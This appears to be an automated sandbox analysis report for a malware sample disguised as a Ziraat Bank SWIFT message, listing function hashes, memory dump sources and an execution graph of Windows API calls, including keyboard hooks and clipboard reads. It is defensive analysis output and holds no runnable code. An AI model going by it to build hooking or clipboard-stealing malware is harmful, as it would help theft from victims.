                                                                          • Opcode ID: 24c1334243be30b6cbd792c4e510555b77b730bad1ce5d7080916fdea7ec0d5b
                                                                          • Instruction ID: adb1d60dfb935b9ecb780281c6fa51046009c8bbefac7231276f71b3a1202d25
                                                                          • Opcode Fuzzy Hash: 24c1334243be30b6cbd792c4e510555b77b730bad1ce5d7080916fdea7ec0d5b
                                                                          • Instruction Fuzzy Hash: 64412F74E0520ADFDB44CFA6D6416AEFBF6EF88300F20D86AC115B7664E3749B418B94
                                                                          Function 06944F10 Relevance: .1, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 584c30f8d636560cb85286fa0d0fe219144179ddf7dbcdd2dd1272218f2be172
                                                                          • Instruction ID: ca50735a1edc2049810899d43a4eb332af47da7d1d90250c122d0baa6e7960b5
                                                                          • Opcode Fuzzy Hash: 584c30f8d636560cb85286fa0d0fe219144179ddf7dbcdd2dd1272218f2be172
                                                                          • Instruction Fuzzy Hash: AD41E6B4E0520ADFDB44DFAAC480AAEFBF2EF88600F14C46AD415A7604D3349A41CF94
                                                                          Function 06940006 Relevance: .1, Instructions: 78COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fc12190be7a2156b266e93609087af90b7e39ecb5b4cf67dc7b99616d5bb0835
                                                                          • Instruction ID: 06447e47805d0e5d2d0473aa3252587aae6825cc4ff1b363078f080b6da451ef
                                                                          • Opcode Fuzzy Hash: fc12190be7a2156b266e93609087af90b7e39ecb5b4cf67dc7b99616d5bb0835
                                                                          • Instruction Fuzzy Hash: B8212D71E057549FE759CF6B8C0069EBBF7AFCA210F18C0B6C948AB265D7340946CB61
                                                                          Function 06940015 Relevance: .1, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d52d782edddf1e165455de4e9b8b0a48e5bad9607088a1001e44797787a56cc9
                                                                          • Instruction ID: 0279a53156d855d41a35848ebc45cd9de38ca76a385b3ae1d38259c11ad77fa5
                                                                          • Opcode Fuzzy Hash: d52d782edddf1e165455de4e9b8b0a48e5bad9607088a1001e44797787a56cc9
                                                                          • Instruction Fuzzy Hash: 9B213971E056589BEB59CF6B8C0079EBBF7AFC9200F18C0BAC958A6265DB340546CF61
                                                                          Function 06940040 Relevance: .1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 34574c4a0076f01eb7b0359da4827ca0944b6e53ed94f20193ca28c54de83428
                                                                          • Instruction ID: fe53fba90ef76af21b1279d07976272247b17932a9f6d391c3d790cf5fa26edd
                                                                          • Opcode Fuzzy Hash: 34574c4a0076f01eb7b0359da4827ca0944b6e53ed94f20193ca28c54de83428
                                                                          • Instruction Fuzzy Hash: 9911D771E046189BEB58CFABD80469EFBF7AFC8210F14C07AC91CB6224EB7406468F51

                                                                          Execution Graph

                                                                          Execution Coverage:12.2%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:4.3%
                                                                          Total number of Nodes:304
                                                                          Total number of Limit Nodes:17
                                                                          execution_graph 35819 111fe40 35820 111fe64 35819->35820 35824 2befee0 35820->35824 35829 2befed0 35820->35829 35821 111fe80 35825 2beff04 35824->35825 35834 111ff20 35825->35834 35838 111ff18 35825->35838 35826 2beff66 35826->35821 35830 2befee0 35829->35830 35832 111ff20 SetWindowsHookExA 35830->35832 35833 111ff18 SetWindowsHookExA 35830->35833 35831 2beff66 35831->35821 35832->35831 35833->35831 35836 111ff64 SetWindowsHookExA 35834->35836 35837 111ffaa 35836->35837 35837->35826 35839 111ff64 SetWindowsHookExA 35838->35839 35841 111ffaa 35839->35841 35841->35826 35842 541b4d0 35843 541b538 CreateWindowExW 35842->35843 35845 541b5f4 35843->35845 35850 541e160 35851 541e1a6 GetCurrentProcess 35850->35851 35853 541e1f1 35851->35853 35854 541e1f8 GetCurrentThread 35851->35854 35853->35854 35855 541e235 GetCurrentProcess 35854->35855 35856 541e22e 35854->35856 35857 541e26b 35855->35857 35856->35855 35858 541e293 GetCurrentThreadId 35857->35858 35859 541e2c4 35858->35859 35860 111cab0 35861 111cadd 35860->35861 35862 111c168 LdrInitializeThunk 35861->35862 35863 111e9bf 35861->35863 35864 111cde6 35861->35864 35862->35864 35864->35863 35865 111c168 LdrInitializeThunk 35864->35865 35865->35864 35868 108d030 35869 108d048 35868->35869 35870 108d0a2 35869->35870 35877 541f3a0 35869->35877 35885 541b7b0 35869->35885 35889 541976c 35869->35889 35897 541975c 35869->35897 35901 541b688 35869->35901 35907 541b678 35869->35907 35880 541f3dd 35877->35880 35878 541f411 35931 541f004 35878->35931 35880->35878 35882 541f401 35880->35882 35881 541f40f 35913 541f528 35882->35913 35922 541f538 35882->35922 35886 541b7c0 35885->35886 35938 5419794 35886->35938 35888 541b7c7 35888->35870 35890 5419777 35889->35890 35891 541f411 35890->35891 35893 541f401 35890->35893 35892 541f004 2 API calls 35891->35892 35894 541f40f 35892->35894 35895 541f528 2 API calls 35893->35895 35896 541f538 2 API calls 35893->35896 35895->35894 35896->35894 35898 5419767 35897->35898 35899 5419794 GetModuleHandleW 35898->35899 35900 541b7c7 35899->35900 35900->35870 35902 541b6ae 35901->35902 35903 541975c GetModuleHandleW 35902->35903 35904 541b6ba 35903->35904 35905 541976c 2 API calls 35904->35905 35906 541b6cf 35905->35906 35906->35870 35908 541b688 35907->35908 35909 541975c GetModuleHandleW 35908->35909 35910 541b6ba 35909->35910 35911 541976c 2 API calls 35910->35911 35912 541b6cf 35911->35912 35912->35870 35914 541f538 35913->35914 35915 541f546 35914->35915 35916 541f578 35914->35916 35918 541f004 2 API calls 35915->35918 35921 541f54e 35915->35921 35917 541f024 GetCurrentThreadId 35916->35917 35919 541f584 35917->35919 35920 541f58c 35918->35920 35919->35881 35920->35881 35921->35881 35923 541f573 35922->35923 35924 541f546 35922->35924 35923->35924 35925 541f578 35923->35925 35927 541f004 2 API calls 35924->35927 35930 541f54e 35924->35930 35926 541f024 GetCurrentThreadId 35925->35926 35928 541f584 35926->35928 35929 541f58c 35927->35929 35928->35881 35929->35881 35930->35881 35932 541f00f 35931->35932 35933 541f5e2 35932->35933 35934 541f68c 35932->35934 35935 541f63a CallWindowProcW 35933->35935 35937 541f5e9 35933->35937 35936 541976c GetCurrentThreadId 35934->35936 35935->35937 35936->35937 35937->35881 35940 541979f 35938->35940 35939 541b897 35942 541b8f4 35939->35942 35944 5419794 GetModuleHandleW 35939->35944 35945 541b7d0 35939->35945 35940->35939 35941 541906c GetModuleHandleW 35940->35941 35941->35939 35942->35888 35944->35942 35947 541b7e0 35945->35947 35946 541b897 35949 541b8f4 35946->35949 35950 541b7d0 GetModuleHandleW 35946->35950 35951 5419794 GetModuleHandleW 35946->35951 35947->35946 35948 541906c GetModuleHandleW 35947->35948 35948->35946 35949->35942 35950->35949 35951->35949 35589 11146d8 35590 11146e4 35589->35590 35596 11148c9 35590->35596 35591 1114713 35604 5414d18 35591->35604 35608 5414d03 35591->35608 35592 111471a 35597 11148e4 35596->35597 35612 1114f08 35597->35612 35618 1114ef8 35597->35618 35598 11148f0 35624 2be15ea 35598->35624 35630 2be15f8 35598->35630 35599 111491a 35599->35591 35605 5414d24 35604->35605 35652 5414d68 35605->35652 35609 5414d24 35608->35609 35611 5414d68 3 API calls 35609->35611 35610 5414d37 35610->35592 35611->35610 35613 1114f2a 35612->35613 35614 1114ff6 35613->35614 35636 111c168 35613->35636 35640 111c158 35613->35640 35646 111c76c 35613->35646 35614->35598 35619 1114f08 35618->35619 35620 1114ff6 35619->35620 35621 111c158 2 API calls 35619->35621 35622 111c168 LdrInitializeThunk 35619->35622 35623 111c76c 2 API calls 35619->35623 35620->35598 35621->35620 35622->35620 35623->35620 35625 2be161a 35624->35625 35626 2be172c 35625->35626 35627 111c158 2 API calls 35625->35627 35628 111c168 LdrInitializeThunk 35625->35628 35629 111c76c 2 API calls 35625->35629 35626->35599 35627->35626 35628->35626 35629->35626 35631 2be161a 35630->35631 35632 2be172c 35631->35632 35633 111c158 2 API calls 35631->35633 35634 111c168 LdrInitializeThunk 35631->35634 35635 111c76c 2 API calls 35631->35635 35632->35599 35633->35632 35634->35632 35635->35632 35637 111c17a 35636->35637 35639 111c17f 35636->35639 35637->35614 35638 111c8a9 LdrInitializeThunk 35638->35637 35639->35637 35639->35638 35641 111c17a 35640->35641 35645 111c17f 35640->35645 35641->35614 35642 111c764 LdrInitializeThunk 35642->35641 35644 111c168 LdrInitializeThunk 35644->35645 35645->35641 35645->35642 35645->35644 35651 111c623 35646->35651 35647 111c764 LdrInitializeThunk 35649 111c8c1 35647->35649 35649->35614 35650 111c168 LdrInitializeThunk 35650->35651 35651->35647 35651->35650 35662 5414d84 35652->35662 35653 5414d9e 35683 541fed8 35653->35683 35689 541fec9 35653->35689 35654 5414da5 35695 111fbd0 35654->35695 35703 111fbc1 35654->35703 35655 5414d37 35655->35592 35663 5416260 35662->35663 35673 5416270 35662->35673 35665 541626e 35663->35665 35668 54162b0 35663->35668 35711 5415e94 35665->35711 35667 54162c9 35669 5415e94 GetModuleHandleW SetTimer 35667->35669 35717 5415ea4 35668->35717 35670 5416300 35669->35670 35671 5415ea4 GetModuleHandleW SetTimer GetCurrentThreadId 35670->35671 35672 5416325 35671->35672 35672->35653 35674 541628c 35673->35674 35675 5415e94 2 API calls 35674->35675 35676 54162b0 35675->35676 35677 5415ea4 3 API calls 35676->35677 35678 54162c9 35677->35678 35679 5415e94 2 API calls 35678->35679 35680 5416300 35679->35680 35681 5415ea4 3 API calls 35680->35681 35682 5416325 35681->35682 35682->35653 35684 541fef4 35683->35684 35685 5415e94 2 API calls 35684->35685 35686 541ff13 35685->35686 35687 5415ea4 3 API calls 35686->35687 35688 541ff38 35687->35688 35688->35654 35690 541fed8 35689->35690 35691 5415e94 2 API calls 35690->35691 35692 541ff13 35691->35692 35693 5415ea4 3 API calls 35692->35693 35694 541ff38 35693->35694 35694->35654 35696 111fbec 35695->35696 35699 5415e94 2 API calls 35696->35699 35809 5416391 35696->35809 35697 111fc0b 35701 5415ea4 3 API calls 35697->35701 35815 541f890 35697->35815 35699->35697 35702 111fc30 35701->35702 35702->35655 35704 111fbd0 35703->35704 35706 5416391 2 API calls 35704->35706 35707 5415e94 2 API calls 35704->35707 35705 111fc0b 35708 541f890 3 API calls 35705->35708 35709 5415ea4 3 API calls 35705->35709 35706->35705 35707->35705 35710 111fc30 35708->35710 35709->35710 35710->35655 35712 5415e9f 35711->35712 35713 54163af 35712->35713 35721 54163c8 35712->35721 35725 54163bf 35712->35725 35729 54163b8 35712->35729 35713->35668 35720 5415eaf 35717->35720 35718 541f91c 35718->35718 35720->35718 35795 541f05c 35720->35795 35723 54163f6 35721->35723 35722 5416481 35722->35722 35723->35722 35733 5415fe4 35723->35733 35727 54163c7 35725->35727 35726 5416481 35726->35726 35727->35726 35728 5415fe4 2 API calls 35727->35728 35728->35726 35731 54163ec 35729->35731 35730 5416481 35730->35730 35731->35730 35732 5415fe4 2 API calls 35731->35732 35732->35730 35734 5415fef 35733->35734 35738 54194f0 35734->35738 35739 5419438 35734->35739 35738->35722 35740 5419443 35739->35740 35741 54194b7 35740->35741 35747 541a310 35740->35747 35754 541a320 35740->35754 35741->35738 35744 5419448 35741->35744 35745 541f800 SetTimer 35744->35745 35746 541f86c 35745->35746 35746->35738 35748 541a320 35747->35748 35761 541a900 35748->35761 35766 541a8f4 35748->35766 35749 541a3ce 35750 541906c GetModuleHandleW 35749->35750 35751 541a3fa 35749->35751 35750->35751 35755 541a34b 35754->35755 35759 541a900 GetModuleHandleW 35755->35759 35760 541a8f4 GetModuleHandleW 35755->35760 35756 541a3fa 35757 541a3ce 35757->35756 35791 541906c 35757->35791 35759->35757 35760->35757 35762 541a92d 35761->35762 35763 541a9ae 35762->35763 35771 541aa60 35762->35771 35781 541aa70 35762->35781 35763->35763 35767 541a92d 35766->35767 35768 541a9ae 35767->35768 35769 541aa60 GetModuleHandleW 35767->35769 35770 541aa70 GetModuleHandleW 35767->35770 35769->35768 35770->35768 35772 541aa70 35771->35772 35773 541906c GetModuleHandleW 35772->35773 35774 541aaa9 35772->35774 35773->35774 35775 541906c GetModuleHandleW 35774->35775 35776 541ac65 35774->35776 35777 541abeb 35775->35777 35776->35763 35777->35776 35778 541906c GetModuleHandleW 35777->35778 35779 541ac39 35778->35779 35779->35776 35780 541906c GetModuleHandleW 35779->35780 35780->35776 35782 541aa85 35781->35782 35783 541906c GetModuleHandleW 35782->35783 35784 541aaa9 35782->35784 35783->35784 35785 541906c GetModuleHandleW 35784->35785 35790 541ac65 35784->35790 35786 541abeb 35785->35786 35787 541906c GetModuleHandleW 35786->35787 35786->35790 35788 541ac39 35787->35788 35789 541906c GetModuleHandleW 35788->35789 35788->35790 35789->35790 35790->35763 35792 541ada0 GetModuleHandleW 35791->35792 35794 541ae15 35792->35794 35794->35756 35796 541f067 35795->35796 35801 541f024 35796->35801 35798 541fabc 35799 5415fe4 2 API calls 35798->35799 35800 541fac5 35799->35800 35800->35718 35802 541f02f 35801->35802 35805 541f07c 35802->35805 35804 541fb15 35804->35798 35806 541f087 35805->35806 35807 541fc81 GetCurrentThreadId 35806->35807 35808 541fcab 35806->35808 35807->35808 35808->35804 35810 5416396 35809->35810 35811 54163af 35810->35811 35812 54163c8 2 API calls 35810->35812 35813 54163b8 2 API calls 35810->35813 35814 54163bf 2 API calls 35810->35814 35811->35697 35812->35811 35813->35811 35814->35811 35818 541f8a0 35815->35818 35816 541f91c 35816->35816 35817 541f05c 3 API calls 35817->35816 35818->35816 35818->35817 35846 541ad98 35847 541ada0 GetModuleHandleW 35846->35847 35849 541ae15 35847->35849 35866 541e3a8 DuplicateHandle 35867 541e43e 35866->35867 35952 6e57218 35953 6e57272 OleGetClipboard 35952->35953 35954 6e572b2 35953->35954

                                                                          Executed Functions

                                                                          Function 02BE7770 Relevance: 12.2, Strings: 9, Instructions: 919COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                          • API String ID: 0-99275883
                                                                          • Opcode ID: 9441937ad06ea109760a0ba92c940bc52d039b85fb9625c9aa4c0540664623d1
                                                                          • Instruction ID: c49b13185a326a27d1ecd79af018772c5bbb8a8048de41a9d87741d82a1a0418
                                                                          • Opcode Fuzzy Hash: 9441937ad06ea109760a0ba92c940bc52d039b85fb9625c9aa4c0540664623d1
                                                                          • Instruction Fuzzy Hash: 89823B70A00A099FCF15CF68C984AAEBBF2FF48314F158599E456DB2A5DB30ED41CB51
                                                                          Function 02BE6998 Relevance: 8.5, Strings: 6, Instructions: 962COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (o]q$(o]q$(o]q$,aq$,aq$Haq
                                                                          • API String ID: 0-387163720
                                                                          • Opcode ID: 181165031ad9140a053e14f3dc21bdc23eb9bf532749095bc19b78129a947e05
                                                                          • Instruction ID: 525eefa2ee7e6972b96f2123c7b81633a1a0d64512a2888d1e2afe4b4bcbbf7b
                                                                          • Opcode Fuzzy Hash: 181165031ad9140a053e14f3dc21bdc23eb9bf532749095bc19b78129a947e05
                                                                          • Instruction Fuzzy Hash: DC826A70A002199FDF15DF69D884AAEBBB6FF88304F1485A9E846DB365DB30DC41DB90
                                                                          Function 02BE1C58 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2309 2be1c58-2be1c80 2310 2be1c87-2be1d2b 2309->2310 2311 2be1c82 2309->2311 2315 2be1d2d-2be1d34 2310->2315 2316 2be1d39-2be1d8a 2310->2316 2311->2310 2317 2be1f94-2be1fb2 2315->2317 2324 2be1e5c 2316->2324 2325 2be1e65-2be1e73 2324->2325 2326 2be1d8f-2be1dbc 2325->2326 2327 2be1e79-2be1e9e 2325->2327 2334 2be1dbe-2be1dc7 2326->2334 2335 2be1ddd 2326->2335 2331 2be1eb6 2327->2331 2332 2be1ea0-2be1eb5 2327->2332 2331->2317 2332->2331 2336 2be1dce-2be1dd1 2334->2336 2337 2be1dc9-2be1dcc 2334->2337 2338 2be1de0-2be1e01 2335->2338 2340 2be1ddb 2336->2340 2337->2340 2343 2be1e5a-2be1e5b 2338->2343 2344 2be1e03-2be1e59 2338->2344 2340->2338 2343->2324 2344->2343
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: PH]q$PH]q
                                                                          • API String ID: 0-1166926398
                                                                          • Opcode ID: 3b70d05d40962ee6852318c4a02459cf50e766d3ed4c02d6ed1703518f5b770e
                                                                          • Instruction ID: b1383ff2fb1f339312294a93a56805eb6d38d4ed803e41ad533b00a397ae0aea
                                                                          • Opcode Fuzzy Hash: 3b70d05d40962ee6852318c4a02459cf50e766d3ed4c02d6ed1703518f5b770e
                                                                          • Instruction Fuzzy Hash: 7B81BF74E00218CFDB28DFAAD9947ADBBF2BF89304F20816AD41AAB354DB745945CF50
                                                                          Function 0111C168 Relevance: 2.0, APIs: 1, Instructions: 528COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4527154963.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_1110000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 98cfeaa867c36240bee71b1399d36644a67ff4c80f28b2fafbbf6744bcb48051
                                                                          • Instruction ID: 3c87b18ca9a456cc2cd7383c743535a6a11d98a60a05d3b38b257dc2b469fb7e
                                                                          • Opcode Fuzzy Hash: 98cfeaa867c36240bee71b1399d36644a67ff4c80f28b2fafbbf6744bcb48051
                                                                          • Instruction Fuzzy Hash: 4A223B70E00219CFDB18DFA8D884B9DFBB2BF89314F1485A9D409AB395DB309985CF91
                                                                          Function 05414DC0 Relevance: 2.0, Strings: 1, Instructions: 761COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4539306412.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_5410000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: 12f8ec3ee1386258e2bae83738b58a1ffc0791ee5a69a196e8a7a551e3645466
                                                                          • Instruction ID: 9b744f8565aaf50ae6e41e92c229b04817b30d3415c55d54c7b2c6e21989a9a9
                                                                          • Opcode Fuzzy Hash: 12f8ec3ee1386258e2bae83738b58a1ffc0791ee5a69a196e8a7a551e3645466
                                                                          • Instruction Fuzzy Hash: F672B175A01218CFDB65DF65D854BEEBBB2BB89300F1084EAD909A7364CB319E81CF54
                                                                          Function 02BE4500 Relevance: .7, Instructions: 745COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dfd42aa66bd25317101a5eec5bfdf7638ee57e2018c9bb07d00ceb43050ebd9b
                                                                          • Instruction ID: 1c1df32f858c4eb594b72d6c62d17cb8075114b30f6c334720c003a3092572a0
                                                                          • Opcode Fuzzy Hash: dfd42aa66bd25317101a5eec5bfdf7638ee57e2018c9bb07d00ceb43050ebd9b
                                                                          • Instruction Fuzzy Hash: 25827D74E012298FDB65DF69C998BDDBBB2BB89300F1081EA944DA7354DB315E81CF81
                                                                          Function 05411620 Relevance: .7, Instructions: 709COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4539306412.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_5410000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3089265a315ad06e20c5ce66084a7c3ac426e26d0b424a5d1d52c8070da49591
                                                                          • Instruction ID: 45d337d7bac31bc597daebc86525a1e257432c30d82cb7baebf9dcaaa6aaf261
                                                                          • Opcode Fuzzy Hash: 3089265a315ad06e20c5ce66084a7c3ac426e26d0b424a5d1d52c8070da49591
                                                                          • Instruction Fuzzy Hash: 6772DF74E052298FDB64DF69C984BD9BBB2BB49300F1091EAD90DA7355DB30AE81CF44
                                                                          Function 02BE15F8 Relevance: .3, Instructions: 296COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7ce02023283bec742043f2c5dd11fb6cbcd3d998ec013404dd576e1f1192da9d
                                                                          • Instruction ID: 4b55fedfaeb959f25a41bc3ef4036fce2ba8946d30d0a90d2abdb4525165b424
                                                                          • Opcode Fuzzy Hash: 7ce02023283bec742043f2c5dd11fb6cbcd3d998ec013404dd576e1f1192da9d
                                                                          • Instruction Fuzzy Hash: 2EE1C274E01218CFEB68DFA9D944B9DBBB2BF89304F2081A9D419A7394DB355E85CF10
                                                                          Function 01114F08 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4527154963.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_1110000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bb27fcff1177af2eb1d5dffbac9293674505089706e35961b48cf8f42e919dec
                                                                          • Instruction ID: 8197f07c78d362290b501df23b9990f886c7bb2e9a1d8f2936dc0eeec0cf0799
                                                                          • Opcode Fuzzy Hash: bb27fcff1177af2eb1d5dffbac9293674505089706e35961b48cf8f42e919dec
                                                                          • Instruction Fuzzy Hash: 6DC1D274E01218CFDB69DFA5D984B9DBBB2BF89304F2080A9D809A7358DB355E85CF50
                                                                          Function 01115358 Relevance: .2, Instructions: 225COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4527154963.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_1110000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5f192e70568e17ca16ffb5d60bdf99e812eeae2410c56f9ed99d2ae4049b9707
                                                                          • Instruction ID: e53213545698846719f85fbb6338daf5b15e55e8dd5f2e834f0ff83043c73652
                                                                          • Opcode Fuzzy Hash: 5f192e70568e17ca16ffb5d60bdf99e812eeae2410c56f9ed99d2ae4049b9707
                                                                          • Instruction Fuzzy Hash: DCA12570D00208CFEB28DFA8D448BDDBBB2FF89304F208269E459AB295DB745985CF51
                                                                          Function 011156AF Relevance: .2, Instructions: 202COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4527154963.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_1110000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8383409a5a49455d1112a5dd96ae5a11e26795776761d4a78ec156c654696b5e
                                                                          • Instruction ID: 4b69ee2d036a087c8c4d0f71d980154426c218cd375a3cefa544e2c24b2d8950
                                                                          • Opcode Fuzzy Hash: 8383409a5a49455d1112a5dd96ae5a11e26795776761d4a78ec156c654696b5e
                                                                          • Instruction Fuzzy Hash: 99910470D00608CFEB68DFA8D548B9CBBB2FF89300F208269E459B7295DB709984CF55
                                                                          Function 02BE15EA Relevance: .1, Instructions: 112COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cd5e220daef793082b0026f500d937000d0c288a264a3936e24d67041d836ced
                                                                          • Instruction ID: 22a6540400f75a7294760ab3e31f5e1375f46c525155eacc22765f93206f2752
                                                                          • Opcode Fuzzy Hash: cd5e220daef793082b0026f500d937000d0c288a264a3936e24d67041d836ced
                                                                          • Instruction Fuzzy Hash: 2F41B2B1D012088BEB18DFAAD8547DDFAB2BF89304F24D169C419BB254EB354946CF54
                                                                          Function 06E5A67D Relevance: .1, Instructions: 81COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4542334944.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e50000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eaf5a0955ec3a8da8af5769ae65b7f4328d5c7b47850212c0f65fdd99acdbf5a
                                                                          • Instruction ID: 1f4173e69bf62dc9ada3d20ad8094aa38bafe992a1c0ba686e52a892e7e4fe67
                                                                          • Opcode Fuzzy Hash: eaf5a0955ec3a8da8af5769ae65b7f4328d5c7b47850212c0f65fdd99acdbf5a
                                                                          • Instruction Fuzzy Hash: 43310F74D01208CFCB54DFA8D0946ECBBB2BF8A304F201669D41AB7294D7399842CF15
                                                                          Function 06E5A583 Relevance: .1, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4542334944.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
